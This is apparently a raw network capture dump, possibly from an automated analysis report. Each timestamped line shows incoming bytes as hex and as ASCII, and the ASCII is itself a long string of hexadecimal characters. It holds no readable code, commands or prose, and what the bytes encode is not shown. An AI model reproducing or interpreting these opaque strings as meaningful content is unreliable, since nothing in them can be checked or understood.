                                                                                                                            2022-10-03 14:01:58 UTC304INData Raw: 43 38 34 44 36 39 37 36 39 37 37 31 45 39 46 41 38 31 46 44 35 31 35 32 35 37 31 31 39 46 33 45 34 43 36 42 43 39 42 36 39 36 32 31 46 46 45 41 38 42 33 45 44 38 33 41 44 30 33 37 39 32 36 33 34 36 36 42 34 37 42 43 42 44 32 31 41 45 45 43 46 33 35 39 31 37 37 43 38 38 44 35 31 41 42 35 36 46 46 35 45 38 46 33 31 33 38 43 45 45 41 36 31 42 43 38 30 43 37 33 32 44 43 31 31 32 33 45 32 33 35 31 35 34 31 36 38 45 33 38 33 37 31 44 39 33 45 39 31 37 39 41 45 38 34 42 42 43 46 35 32 34 34 42 46 34 46 31 31 35 44 44 38 43 39 46 35 35 43 32 44 31 37 46 39 41 39 42 32 39 36 41 41 30 41 45 45 39 33 42 44 39 31 45 39 41 36 39 42 39 37 46 45 46 34 39 31 38 34 44 45 37 34 42 38 34 37 41 34 42 41 37 39 45 36 42 30 43 34 35 43 46 37 45 41 32 30 46 32 36 31 33 42 43 34
                                                                                                                            Data Ascii: C84D69769771E9FA81FD515257119F3E4C6BC9B69621FFEA8B3ED83AD0379263466B47BCBD21AEECF359177C88D51AB56FF5E8F3138CEEA61BC80C732DC1123E235154168E38371D93E9179AE84BBCF5244BF4F115DD8C9F55C2D17F9A9B296AA0AEE93BD91E9A69B97FEF49184DE74B847A4BA79E6B0C45CF7EA20F2613BC4
                                                                                                                            2022-10-03 14:01:58 UTC320INData Raw: 44 41 34 41 46 45 43 41 46 44 32 39 38 42 35 37 31 35 33 46 35 46 39 36 33 46 37 42 34 35 31 38 42 44 36 39 38 35 33 36 41 33 41 33 30 39 33 45 41 32 36 32 42 35 33 35 34 45 32 42 45 30 34 41 41 33 44 46 31 46 44 39 35 41 35 31 44 33 46 46 44 32 43 42 37 42 45 37 43 36 37 36 45 34 38 46 37 33 31 44 44 36 46 45 45 42 42 41 39 46 30 44 35 39 44 33 31 43 34 43 46 45 41 30 38 44 41 31 45 44 35 46 31 31 32 45 36 42 41 33 32 42 36 44 36 43 36 43 35 39 33 35 38 36 39 46 30 41 35 33 32 33 34 44 46 34 41 34 34 34 34 45 35 42 35 30 33 34 32 41 44 31 44 44 39 35 30 37 35 39 46 39 35 35 37 46 35 33 46 37 39 37 39 34 42 31 32 44 32 32 37 44 44 32 44 39 44 37 38 32 38 43 32 45 37 44 35 37 36 41 37 30 46 38 46 45 45 31 38 46 35 44 30 34 36 37 39 33 37 46 31 31 37 38 44
                                                                                                                            Data Ascii: DA4AFECAFD298B57153F5F963F7B4518BD698536A3A3093EA262B5354E2BE04AA3DF1FD95A51D3FFD2CB7BE7C676E48F731DD6FEEBBA9F0D59D31C4CFEA08DA1ED5F112E6BA32B6D6C6C5935869F0A53234DF4A4444E5B50342AD1DD950759F9557F53F79794B12D227DD2D9D7828C2E7D576A70F8FEE18F5D0467937F1178D
                                                                                                                            2022-10-03 14:01:58 UTC336INData Raw: 34 35 36 43 43 31 35 44 42 37 37 42 36 45 32 32 37 34 36 37 42 30 35 36 34 44 41 38 44 41 32 34 42 36 36 31 33 31 37 44 30 33 42 36 43 36 44 31 41 39 42 33 30 38 41 42 32 31 32 31 35 46 43 36 33 30 37 30 32 35 45 30 42 46 37 46 31 44 30 31 32 45 39 36 44 43 46 36 34 42 45 33 46 38 43 30 34 35 37 44 36 37 42 32 41 35 45 35 45 39 39 45 43 41 39 39 33 39 43 31 44 46 43 37 34 30 44 44 42 31 35 44 31 31 42 34 32 37 42 33 44 39 35 32 42 44 42 30 46 44 36 45 44 41 31 36 44 39 45 43 41 39 36 39 36 44 35 39 45 31 39 42 36 38 43 37 36 37 43 36 30 35 34 43 33 42 33 44 39 35 33 39 33 31 39 42 37 32 31 37 36 35 39 46 31 38 30 35 33 39 33 36 37 43 37 34 30 36 41 34 42 36 45 33 34 43 33 33 33 44 39 35 32 43 41 33 33 36 45 37 34 42 34 42 33 44 39 35 33 34 32 41 46 45 46
                                                                                                                            Data Ascii: 456CC15DB77B6E227467B0564DA8DA24B661317D03B6C6D1A9B308AB21215FC6307025E0BF7F1D012E96DCF64BE3F8C0457D67B2A5E5E99ECA9939C1DFC740DDB15D11B427B3D952BDB0FD6EDA16D9ECA9696D59E19B68C767C6054C3B3D9539319B7217659F180539367C7406A4B6E34C333D952CA336E74B4B3D95342AFEF
                                                                                                                            2022-10-03 14:01:58 UTC352INData Raw: 31 39 36 35 35 33 36 45 39 44 30 34 39 34 46 33 34 35 46 34 45 33 44 39 46 42 34 33 42 38 43 42 39 41 45 37 30 39 41 32 45 43 44 34 42 37 31 39 34 30 45 36 44 43 36 35 44 39 45 36 38 41 42 38 43 42 38 35 46 45 31 31 42 37 45 31 39 41 38 32 43 44 32 37 41 36 45 33 32 45 36 34 33 33 36 45 35 39 44 44 32 31 45 45 32 43 32 42 35 46 33 39 33 45 31 36 46 46 37 31 38 44 33 45 30 38 42 41 45 45 45 35 31 35 38 37 45 43 39 31 36 44 45 31 39 43 41 44 41 34 35 34 36 32 38 33 43 38 33 41 38 37 46 33 43 43 30 33 46 35 39 36 32 33 46 35 39 36 36 34 44 30 39 34 35 34 31 46 38 34 38 32 42 41 31 37 34 35 31 43 38 42 35 34 31 44 34 43 43 37 35 42 36 37 35 31 46 35 34 30 37 41 34 43 46 38 44 33 34 42 30 31 39 34 44 43 34 35 33 46 46 45 41 41 30 44 46 38 37 34 32 31 33 39 43
                                                                                                                            Data Ascii: 1965536E9D0494F345F4E3D9FB43B8CB9AE709A2ECD4B71940E6DC65D9E68AB8CB85FE11B7E19A82CD27A6E32E64336E59DD21EE2C2B5F393E16FF718D3E08BAEEE51587EC916DE19CADA4546283C83A87F3CC03F59623F59664D094541F8482BA17451C8B541D4CC75B6751F5407A4CF8D34B0194DC453FFEAA0DF8742139C
                                                                                                                            2022-10-03 14:01:58 UTC368INData Raw: 30 44 35 43 32 43 44 38 36 42 33 44 30 45 42 43 46 34 37 33 36 30 45 41 33 43 41 46 30 31 42 44 44 46 33 38 34 42 32 44 46 39 31 33 35 45 36 43 36 41 30 31 42 34 45 45 39 37 35 36 35 34 38 33 33 46 37 37 46 37 35 46 32 32 36 37 34 37 38 41 45 43 39 45 41 46 33 36 46 33 44 33 36 39 43 46 42 45 33 46 30 42 33 41 42 45 44 34 45 42 46 31 35 39 44 30 31 30 44 34 38 35 33 46 35 31 45 35 41 42 46 39 30 39 38 41 31 41 45 33 42 44 46 41 33 42 35 38 42 38 41 45 35 30 37 34 45 42 43 34 33 34 39 42 42 34 45 33 44 30 33 32 39 38 33 36 30 38 34 34 43 38 37 42 32 35 30 38 43 39 31 42 31 39 41 31 34 38 37 38 46 35 30 31 39 32 39 39 44 36 44 46 33 39 44 42 39 33 33 34 33 42 46 44 41 44 38 36 34 35 37 33 41 42 42 33 30 44 44 39 33 46 33 39 44 39 39 30 43 46 36 31 41 42 42
                                                                                                                            Data Ascii: 0D5C2CD86B3D0EBCF47360EA3CAF01BDDF384B2DF9135E6C6A01B4EE975654833F77F75F2267478AEC9EAF36F3D369CFBE3F0B3ABED4EBF159D010D4853F51E5ABF9098A1AE3BDFA3B58B8AE5074EBC4349BB4E3D03298360844C87B2508C91B19A14878F5019299D6DF39DB93343BFDAD864573ABB30DD93F39D990CF61ABB
                                                                                                                            2022-10-03 14:01:58 UTC384INData Raw: 38 35 35 34 46 33 42 34 32 33 43 46 45 34 36 32 34 39 34 44 35 44 37 32 31 32 37 30 39 33 34 45 44 31 38 36 32 41 35 46 43 45 44 31 38 36 32 37 30 32 34 36 35 33 42 34 41 34 32 45 38 45 34 36 30 45 42 34 32 43 46 39 45 37 36 41 43 42 45 33 35 30 39 33 43 45 39 32 31 37 33 34 45 37 39 37 34 36 32 44 42 36 34 30 45 46 38 45 44 39 45 32 35 34 44 41 37 38 38 31 38 42 41 44 43 31 42 33 44 43 30 43 38 42 42 32 43 41 32 43 39 34 43 33 39 43 46 32 39 44 43 45 39 30 32 39 46 39 44 32 33 32 45 43 34 37 31 45 41 46 39 44 32 33 35 32 41 37 34 39 36 33 44 46 46 36 36 37 34 38 44 30 36 32 33 38 43 35 30 45 42 34 35 37 45 35 38 36 41 30 34 35 42 38 33 44 46 37 37 31 35 39 30 30 45 35 39 33 37 35 38 42 35 35 35 38 46 39 39 32 30 37 37 46 37 44 46 38 35 44 46 35 31 45 45
                                                                                                                            Data Ascii: 8554F3B423CFE462494D5D721270934ED1862A5FCED18627024653B4A42E8E460EB42CF9E76ACBE35093CE921734E797462DB640EF8ED9E254DA78818BADC1B3DC0C8BB2CA2C94C39CF29DCE9029F9D232EC471EAF9D2352A74963DFF66748D06238C50EB457E586A045B83DF7715900E593758B5558F992077F7DF85DF51EE
                                                                                                                            2022-10-03 14:01:58 UTC400INData Raw: 38 34 30 43 33 41 39 32 30 36 31 39 44 32 31 38 44 43 34 42 35 37 30 44 31 32 32 33 33 39 34 32 34 38 37 44 37 41 41 32 39 30 39 42 42 38 41 38 37 37 43 30 43 46 42 45 35 43 44 36 30 42 35 30 31 30 37 34 45 37 36 45 34 37 43 35 34 43 37 35 39 42 34 41 36 43 41 35 32 33 45 30 34 45 43 41 43 34 35 30 31 34 44 30 34 37 43 43 30 41 43 30 45 30 30 44 31 32 39 41 37 41 42 44 39 34 44 31 35 39 32 32 34 32 39 39 36 44 36 36 45 44 30 39 33 36 32 41 31 39 33 35 46 32 33 36 36 34 39 34 43 41 43 35 34 39 35 44 32 33 39 44 34 34 39 42 34 45 46 41 35 31 31 35 44 45 34 38 35 33 36 42 39 41 32 41 37 32 34 37 44 33 31 33 30 36 34 34 37 33 46 44 33 45 34 45 44 33 38 41 36 45 41 38 44 44 44 34 43 42 35 41 34 35 43 41 31 43 44 30 37 33 42 33 37 34 33 36 41 41 38 31 31 43 45
                                                                                                                            Data Ascii: 840C3A920619D218DC4B570D12233942487D7AA2909BB8A877C0CFBE5CD60B501074E76E47C54C759B4A6CA523E04ECAC45014D047CC0AC0E00D129A7ABD94D1592242996D66ED09362A1935F2366494CAC5495D239D449B4EFA5115DE48536B9A2A7247D313064473FD3E4ED38A6EA8DDD4CB5A45CA1CD073B37436AA811CE
                                                                                                                            2022-10-03 14:01:58 UTC416INData Raw: 34 39 37 32 38 39 45 35 45 44 32 46 36 30 32 39 41 41 42 31 46 33 41 45 43 39 44 32 34 44 35 43 30 36 45 44 32 31 37 38 35 38 32 35 30 36 30 43 42 45 43 38 33 30 35 37 43 43 31 38 36 33 37 42 39 45 41 34 38 45 39 36 42 37 32 34 38 46 31 46 46 41 31 46 34 30 39 34 32 41 46 36 39 42 43 35 38 45 31 34 38 35 32 37 39 30 43 31 46 43 31 43 43 43 32 31 45 37 30 30 36 35 43 33 36 30 33 32 43 33 45 45 46 30 31 43 34 36 37 30 31 36 35 45 33 35 34 33 38 45 33 46 32 32 34 44 34 32 33 44 37 34 31 34 38 30 34 32 43 44 34 30 42 37 44 33 35 34 33 38 43 31 45 41 30 44 42 45 43 36 32 46 39 33 44 35 34 32 32 42 37 41 30 41 34 30 32 31 33 35 34 30 42 37 46 37 35 34 33 38 41 36 41 38 37 38 46 32 44 36 42 32 34 39 30 41 43 42 37 39 30 35 45 31 36 34 37 35 35 30 38 30 44 45 38
                                                                                                                            Data Ascii: 497289E5ED2F6029AAB1F3AEC9D24D5C06ED21785825060CBEC83057CC18637B9EA48E96B7248F1FFA1F40942AF69BC58E14852790C1FC1CCC21E70065C36032C3EEF01C4670165E35438E3F224D423D74148042CD40B7D35438C1EA0DBEC62F93D5422B7A0A40213540B7F75438A6A878F2D6B2490ACB7905E164755080DE8
                                                                                                                            2022-10-03 14:01:58 UTC432INData Raw: 33 33 38 42 41 35 38 34 36 39 43 45 46 43 45 32 46 43 31 45 36 45 46 44 32 33 39 32 37 45 42 44 39 33 36 37 44 38 31 44 39 31 37 32 35 42 43 42 30 41 44 37 39 34 46 38 36 43 36 31 35 41 31 31 30 33 41 43 35 33 36 43 38 38 37 32 32 33 41 33 44 35 33 43 38 38 34 42 46 45 37 39 31 30 44 36 46 38 30 32 39 35 31 43 37 39 43 41 37 30 34 37 35 32 38 44 35 38 45 41 34 30 37 32 30 37 44 33 36 30 42 30 45 39 34 44 46 32 32 37 34 41 39 35 37 36 42 39 31 33 43 36 33 34 39 46 39 31 32 30 43 32 37 31 44 31 35 37 32 36 33 39 38 33 30 41 43 35 44 34 34 39 44 45 32 42 31 35 31 35 46 30 42 43 33 39 46 44 46 44 31 46 37 32 42 31 45 31 38 36 34 36 30 36 35 38 43 41 42 39 35 38 46 41 43 31 32 30 36 39 33 30 30 44 33 36 38 44 34 42 37 30 37 42 30 39 37 33 34 39 32 41 45 38 44
                                                                                                                            Data Ascii: 338BA58469CEFCE2FC1E6EFD23927EBD9367D81D91725BCB0AD794F86C615A1103AC536C887223A3D53C884BFE7910D6F802951C79CA7047528D58EA407207D360B0E94DF2274A9576B913C6349F9120C271D1572639830AC5D449DE2B1515F0BC39FDFD1F72B1E186460658CAB958FAC12069300D368D4B707B0973492AE8D
                                                                                                                            2022-10-03 14:01:58 UTC448INData Raw: 32 30 44 36 32 38 32 30 43 36 35 37 34 43 44 39 37 45 36 44 31 45 36 30 43 35 32 45 42 46 31 46 37 46 32 44 42 33 32 43 45 34 43 38 30 43 35 43 45 39 46 37 44 31 39 37 45 33 39 33 39 41 31 34 43 41 42 46 33 34 31 46 31 43 44 30 38 31 37 30 37 41 30 44 32 30 31 39 32 38 46 37 42 31 39 39 36 38 35 42 36 35 46 41 45 36 44 42 44 34 43 30 39 36 30 39 41 35 39 36 45 35 46 32 45 39 31 38 45 33 41 46 32 39 31 33 37 35 42 36 31 37 46 31 44 33 46 32 43 30 45 37 37 43 45 42 35 41 43 32 45 32 36 44 37 38 36 45 41 39 32 45 42 30 42 32 34 34 30 45 43 36 36 33 37 36 30 35 45 34 37 33 33 31 42 44 31 32 46 45 34 36 38 45 32 36 43 44 33 31 41 46 43 30 39 46 39 36 44 39 31 36 37 30 38 31 37 41 32 31 37 37 31 38 45 44 34 45 36 33 37 35 35 33 31 34 46 41 33 37 35 34 32 36 35
                                                                                                                            Data Ascii: 20D62820C6574CD97E6D1E60C52EBF1F7F2DB32CE4C80C5CE9F7D197E3939A14CABF341F1CD081707A0D201928F7B199685B65FAE6DBD4C09609A596E5F2E918E3AF291375B617F1D3F2C0E77CEB5AC2E26D786EA92EB0B2440EC6637605E47331BD12FE468E26CD31AFC09F96D91670817A217718ED4E63755314FA3754265
                                                                                                                            2022-10-03 14:01:58 UTC464INData Raw: 32 44 35 35 39 30 43 46 33 33 44 41 44 34 36 31 36 32 35 38 32 30 35 35 32 30 35 37 41 30 35 45 43 39 31 41 34 36 43 37 38 39 32 42 36 42 43 43 43 42 37 39 33 44 31 44 37 39 33 43 31 31 46 38 41 32 34 32 46 31 46 42 35 33 41 44 42 43 36 38 42 30 32 38 34 42 37 39 41 37 31 30 45 31 46 35 45 39 41 34 43 34 46 41 33 37 36 38 35 30 45 32 34 35 43 37 34 43 43 42 33 31 35 31 33 35 43 36 45 35 32 36 45 35 37 43 33 34 36 39 34 39 42 41 32 46 32 32 30 43 38 38 32 39 46 44 38 37 35 31 30 46 37 43 35 31 38 30 45 33 35 30 30 33 30 31 41 34 43 33 35 38 36 30 37 36 38 38 39 46 33 35 33 30 44 35 33 35 36 34 37 35 38 42 39 46 35 46 41 39 38 41 32 36 41 38 32 42 38 38 33 35 45 37 46 35 37 31 31 37 32 41 45 30 33 38 46 39 39 39 45 31 41 46 32 36 39 45 34 44 33 33 32 38 30
                                                                                                                            Data Ascii: 2D5590CF33DAD461625820552057A05EC91A46C7892B6BCCCB793D1D793C11F8A242F1FB53ADBC68B0284B79A710E1F5E9A4C4FA376850E245C74CCB315135C6E526E57C346949BA2F220C8829FD87510F7C5180E3500301A4C3586076889F3530D53564758B9F5FA98A26A82B8835E7F571172AE038F999E1AF269E4D33280
                                                                                                                            2022-10-03 14:01:58 UTC480INData Raw: 41 30 31 42 31 42 42 34 33 36 41 30 30 30 44 39 39 35 33 34 34 32 35 43 37 43 36 46 34 30 30 37 35 34 37 37 37 32 34 34 42 38 39 36 33 46 36 30 38 30 37 36 43 34 35 34 39 31 31 36 38 31 38 39 35 34 38 36 32 34 32 35 44 35 44 44 31 43 44 41 46 37 31 35 31 44 31 43 44 38 45 31 38 30 39 39 35 36 46 38 33 36 36 42 44 44 42 36 37 32 34 38 31 30 32 39 37 38 33 37 35 37 33 33 43 46 34 46 39 43 39 31 39 34 45 32 33 46 46 43 43 44 44 34 45 32 36 41 32 38 42 35 36 39 34 30 45 33 45 41 32 46 45 35 45 33 36 31 33 34 36 35 45 36 43 46 33 38 32 45 39 30 42 35 41 39 39 31 46 39 44 36 33 39 41 42 44 46 38 34 43 39 32 44 42 37 33 35 37 35 43 46 31 36 43 43 43 45 45 37 32 44 42 39 41 45 36 45 37 39 32 35 35 42 34 46 30 38 32 36 45 39 44 41 30 38 31 45 43 33 42 42 42 31 45
                                                                                                                            Data Ascii: A01B1BB436A000D99534425C7C6F400754777244B8963F608076C4549116818954862425D5DD1CDAF7151D1CD8E1809956F8366BDDB67248102978375733CF4F9C9194E23FFCCDD4E26A28B56940E3EA2FE5E3613465E6CF382E90B5A991F9D639ABDF84C92DB73575CF16CCCEE72DB9AE6E79255B4F0826E9DA081EC3BBB1E
                                                                                                                            2022-10-03 14:01:58 UTC496INData Raw: 41 45 34 46 44 41 35 32 35 45 33 39 34 31 38 34 42 42 31 42 37 36 39 34 33 31 39 30 43 39 36 33 45 34 37 43 41 43 41 30 45 42 32 34 34 45 42 36 39 37 37 37 42 42 39 39 43 37 45 38 32 33 33 36 39 33 36 30 45 46 36 37 44 36 45 43 33 33 39 31 37 46 33 44 32 46 35 30 33 36 32 42 45 32 41 37 45 45 44 41 30 42 46 44 31 42 39 38 34 32 36 30 34 35 45 36 46 41 35 45 44 46 36 38 30 42 31 44 35 32 39 32 45 30 46 34 31 42 32 45 31 43 38 36 33 41 35 42 31 38 44 45 32 45 42 31 32 35 44 35 36 38 44 39 39 32 31 35 43 35 43 32 37 37 42 30 44 42 30 39 34 32 45 32 30 46 31 39 33 34 30 43 42 46 31 41 33 45 41 31 34 43 38 43 43 42 37 39 34 43 36 36 35 30 42 43 31 39 44 45 36 46 33 38 44 39 46 32 37 34 37 46 42 31 36 30 43 30 32 42 45 39 31 41 34 45 38 38 35 45 31 31 46 34 38
                                                                                                                            Data Ascii: AE4FDA525E394184BB1B76943190C963E47CACA0EB244EB69777BB99C7E823369360EF67D6EC33917F3D2F50362BE2A7EEDA0BFD1B98426045E6FA5EDF680B1D5292E0F41B2E1C863A5B18DE2EB125D568D99215C5C277B0DB0942E20F19340CBF1A3EA14C8CCB794C6650BC19DE6F38D9F2747FB160C02BE91A4E885E11F48
                                                                                                                            2022-10-03 14:01:58 UTC512INData Raw: 32 37 31 35 35 44 36 44 39 38 30 44 34 33 38 37 32 39 44 36 46 41 43 33 39 33 46 34 38 44 31 41 45 44 31 34 42 31 34 38 37 41 39 31 35 37 39 35 35 44 36 44 45 46 45 31 46 43 45 34 44 44 39 31 36 36 44 46 43 33 42 35 35 41 33 35 35 42 42 33 33 42 33 34 33 32 46 38 33 46 46 36 43 36 44 45 31 37 37 38 34 37 37 31 41 31 38 37 36 38 45 35 31 43 44 44 45 32 39 41 33 34 39 46 39 31 44 35 46 41 34 32 45 39 41 33 37 35 39 41 39 41 33 37 45 45 43 38 31 32 36 34 36 30 45 32 41 39 37 36 43 42 33 36 32 38 45 42 45 45 38 34 46 33 36 39 37 33 32 44 32 43 46 38 36 46 46 45 39 37 38 39 39 44 31 39 42 38 32 46 35 44 42 33 46 36 30 39 43 30 32 39 34 33 33 42 41 43 42 35 35 39 36 36 35 33 35 44 34 43 42 43 44 39 35 41 32 36 35 30 45 38 44 30 38 37 43 43 35 44 42 39 44 30 39
                                                                                                                            Data Ascii: 27155D6D980D438729D6FAC393F48D1AED14B1487A9157955D6DEFE1FCE4DD9166DFC3B55A355BB33B3432F83FF6C6DE17784771A18768E51CDDE29A349F91D5FA42E9A3759A9A37EEC8126460E2A976CB3628EBEE84F369732D2CF86FFE97899D19B82F5DB3F609C029433BACB55966535D4CBCD95A2650E8D087CC5DB9D09
                                                                                                                            2022-10-03 14:01:58 UTC528INData Raw: 39 32 34 34 34 34 41 43 34 39 38 43 42 43 35 41 38 30 34 41 31 43 43 41 32 41 46 44 36 41 41 39 39 33 30 43 30 39 45 45 33 35 43 32 37 43 30 42 33 39 30 42 32 44 31 39 30 46 45 38 42 34 35 43 42 46 31 42 37 42 37 38 35 44 31 38 31 34 43 34 41 42 42 45 41 43 34 46 33 44 35 42 42 39 42 37 42 41 44 41 42 44 44 36 34 42 46 39 30 39 42 42 41 42 34 33 43 38 31 36 46 31 35 38 30 45 39 34 36 45 31 45 46 37 36 32 44 39 35 30 39 36 37 35 35 30 35 32 33 43 33 36 44 32 38 45 41 33 30 41 44 36 41 38 37 32 38 33 46 36 33 36 42 42 38 41 33 38 32 37 36 36 44 34 32 42 45 42 36 45 30 39 43 45 32 34 30 46 46 35 42 46 41 31 33 46 31 42 37 45 35 43 31 35 35 39 41 32 43 31 37 36 44 30 39 32 39 42 34 30 39 38 34 33 31 43 30 39 34 33 37 35 35 44 41 35 30 30 31 44 43 42 38 32 30
                                                                                                                            Data Ascii: 924444AC498CBC5A804A1CCA2AFD6AA9930C09EE35C27C0B390B2D190FE8B45CBF1B7B785D1814C4ABBEAC4F3D5BB9B7BADABDD64BF909BBAB43C816F1580E946E1EF762D950967550523C36D28EA30AD6A87283F636BB8A382766D42BEB6E09CE240FF5BFA13F1B7E5C1559A2C176D0929B4098431C0943755DA5001DCB820
                                                                                                                            2022-10-03 14:01:58 UTC544INData Raw: 42 44 33 36 33 38 42 35 39 45 30 43 43 44 44 38 38 38 45 39 42 31 31 31 43 36 33 45 41 39 38 36 32 44 45 30 39 31 33 36 39 36 31 44 31 44 43 39 36 30 39 38 34 30 39 38 33 46 30 38 30 45 31 33 42 44 43 34 44 38 32 37 41 39 32 34 34 44 42 32 42 31 42 41 32 42 34 36 39 41 34 31 35 37 37 39 38 44 35 46 44 31 41 44 33 42 31 32 32 44 43 42 34 46 37 33 32 33 36 36 36 32 30 34 35 36 38 31 30 43 41 33 43 41 30 39 43 41 30 43 35 38 30 42 32 38 34 33 32 39 32 35 31 35 37 32 33 45 42 41 31 33 41 44 41 31 37 32 30 37 33 46 36 38 30 34 41 35 43 46 45 42 38 42 43 39 35 44 38 33 38 43 30 43 43 42 39 46 44 35 38 36 33 33 39 41 34 41 46 33 30 34 46 35 44 35 45 30 43 33 30 34 44 35 44 42 44 41 33 42 38 34 31 46 34 43 46 31 46 43 31 39 46 38 44 30 32 30 37 37 35 35 33 39 35
                                                                                                                            Data Ascii: BD3638B59E0CCDD888E9B111C63EA9862DE09136961D1DC9609840983F080E13BDC4D827A9244DB2B1BA2B469A4157798D5FD1AD3B122DCB4F732366620456810CA3CA09CA0C580B2843292515723EBA13ADA172073F6804A5CFEB8BC95D838C0CCB9FD586339A4AF304F5D5E0C304D5DBDA3B841F4CF1FC19F8D0207755395
                                                                                                                            2022-10-03 14:01:58 UTC560INData Raw: 46 38 33 37 44 42 44 31 42 37 36 32 31 39 41 43 42 44 35 33 42 42 39 44 34 33 39 32 31 42 32 38 36 44 31 37 33 35 39 44 43 45 45 31 30 37 34 41 38 43 32 42 38 41 44 35 41 36 36 31 35 43 42 43 36 44 32 30 33 33 44 41 41 41 44 39 33 38 46 44 46 46 31 46 32 42 33 42 33 42 34 30 38 36 32 37 37 31 45 41 32 46 31 45 42 39 38 33 30 44 42 33 36 41 43 31 35 43 39 42 32 30 45 36 45 42 35 38 39 44 43 36 41 30 46 44 41 30 41 38 43 33 38 42 37 36 30 31 44 36 41 30 31 37 35 42 36 36 44 36 36 41 30 35 43 38 39 44 35 46 35 34 44 37 38 41 43 38 46 45 36 35 35 44 46 39 33 46 41 43 34 31 33 30 39 34 38 44 33 31 30 43 34 46 45 41 43 44 33 35 44 43 30 41 38 38 46 32 43 43 35 44 46 44 35 37 45 32 33 35 33 31 39 43 31 43 42 46 35 32 42 34 34 44 43 32 41 33 33 35 34 43 35 31 44
                                                                                                                            Data Ascii: F837DBD1B76219ACBD53BB9D43921B286D17359DCEE1074A8C2B8AD5A6615CBC6D2033DAAAD938FDFF1F2B3B3B40862771EA2F1EB9830DB36AC15C9B20E6EB589DC6A0FDA0A8C38B7601D6A0175B66D66A05C89D5F54D78AC8FE655DF93FAC4130948D310C4FEACD35DC0A88F2CC5DFD57E235319C1CBF52B44DC2A3354C51D
                                                                                                                            2022-10-03 14:01:58 UTC576INData Raw: 36 32 41 37 34 42 45 37 36 46 45 45 46 30 34 30 33 37 37 43 38 33 37 37 43 33 44 45 41 35 41 44 30 30 31 46 44 30 34 33 35 43 33 34 31 44 33 30 38 37 42 31 35 43 41 30 41 32 41 32 38 39 46 41 45 43 35 39 30 42 36 33 42 46 36 30 37 37 37 38 34 34 30 35 33 44 30 43 46 35 35 39 30 32 30 36 35 43 41 30 46 36 38 42 41 41 39 34 35 44 43 34 44 38 42 41 30 33 45 44 38 42 42 39 44 42 31 37 34 32 46 46 38 44 45 32 45 41 42 31 32 31 36 30 41 34 43 32 42 43 36 44 44 41 35 42 45 39 42 32 46 46 30 37 31 37 37 36 45 44 39 31 42 43 43 41 46 44 33 31 43 34 43 32 31 39 32 31 45 44 35 33 34 34 38 41 32 33 37 30 41 44 35 44 45 34 30 42 33 43 34 34 37 32 33 46 37 31 30 45 46 30 32 39 46 36 32 43 35 46 43 39 43 34 41 46 43 46 43 30 42 33 33 38 43 32 35 33 33 33 38 44 41 34 34
                                                                                                                            Data Ascii: 62A74BE76FEEF040377C8377C3DEA5AD001FD0435C341D3087B15CA0A2A289FAEC590B63BF60777844053D0CF55902065CA0F68BAA945DC4D8BA03ED8BB9DB1742FF8DE2EAB12160A4C2BC6DDA5BE9B2FF071776ED91BCCAFD31C4C21921ED53448A2370AD5DE40B3C44723F710EF029F62C5FC9C4AFCFC0B338C253338DA44
                                                                                                                            2022-10-03 14:01:58 UTC592INData Raw: 33 42 30 45 36 36 42 34 33 43 43 44 36 41 35 43 45 43 34 45 36 41 30 41 31 36 44 30 35 43 41 39 36 35 35 32 35 36 30 36 37 38 34 33 44 35 42 34 43 44 30 34 39 34 46 41 35 32 42 36 34 31 35 37 37 32 46 37 31 31 34 45 41 46 42 35 35 31 30 42 44 46 33 46 32 43 36 39 46 44 38 31 44 43 32 41 32 36 37 31 45 46 42 45 33 31 38 38 35 45 34 39 41 32 32 43 43 34 31 41 36 45 33 37 31 41 38 42 31 37 46 30 32 43 41 43 45 32 39 30 38 44 32 36 43 43 35 42 43 44 44 39 36 42 37 39 38 42 37 44 44 32 42 31 35 44 44 43 43 38 37 46 32 33 39 37 34 46 30 36 41 33 35 46 36 34 38 38 37 34 46 46 34 37 46 35 41 33 38 38 39 43 42 34 33 31 31 46 43 36 32 43 44 41 38 32 36 45 41 42 30 43 41 38 37 37 34 33 38 45 42 34 37 39 44 31 39 32 43 35 45 36 34 31 36 46 44 35 30 45 31 37 37 32 44
                                                                                                                            Data Ascii: 3B0E66B43CCD6A5CEC4E6A0A16D05CA9655256067843D5B4CD0494FA52B6415772F7114EAFB5510BDF3F2C69FD81DC2A2671EFBE31885E49A22CC41A6E371A8B17F02CACE2908D26CC5BCDD96B798B7DD2B15DDCC87F23974F06A35F648874FF47F5A3889CB4311FC62CDA826EAB0CA877438EB479D192C5E6416FD50E1772D
                                                                                                                            2022-10-03 14:01:58 UTC608INData Raw: 45 32 42 33 33 34 39 38 31 32 30 36 30 37 41 42 46 31 41 30 36 39 46 39 42 31 31 43 43 42 39 46 39 38 32 35 43 46 43 43 36 37 33 35 43 36 36 39 41 38 33 38 43 33 43 33 35 39 37 36 46 36 37 30 30 30 44 46 33 44 44 36 43 41 39 43 31 45 31 33 45 33 36 39 31 42 30 42 33 39 35 38 43 35 33 41 45 30 32 45 32 45 37 45 45 37 33 35 34 32 39 41 30 33 36 35 36 39 38 38 30 36 32 35 30 35 46 36 33 46 34 45 32 45 32 42 35 45 46 31 41 42 43 30 35 32 45 30 36 35 31 35 41 33 38 35 45 37 35 31 42 33 41 35 41 32 30 32 35 39 38 39 36 38 42 39 38 32 32 30 44 42 45 30 42 31 37 35 43 31 43 39 39 45 30 45 30 41 42 41 35 32 30 35 30 44 38 30 30 45 37 34 42 39 37 30 30 44 35 41 32 33 31 41 37 33 39 38 42 42 37 41 35 45 30 30 45 35 39 41 35 37 45 37 41 44 35 45 33 31 45 34 38 34 34
                                                                                                                            Data Ascii: E2B33498120607ABF1A069F9B11CCB9F9825CFCC6735C669A838C3C35976F67000DF3DD6CA9C1E13E3691B0B3958C53AE02E2E7EE735429A03656988062505F63F4E2E2B5EF1ABC052E06515A385E751B3A5A202598968B98220DBE0B175C1C99E0E0ABA52050D800E74B9700D5A231A7398BB7A5E00E59A57E7AD5E31E4844
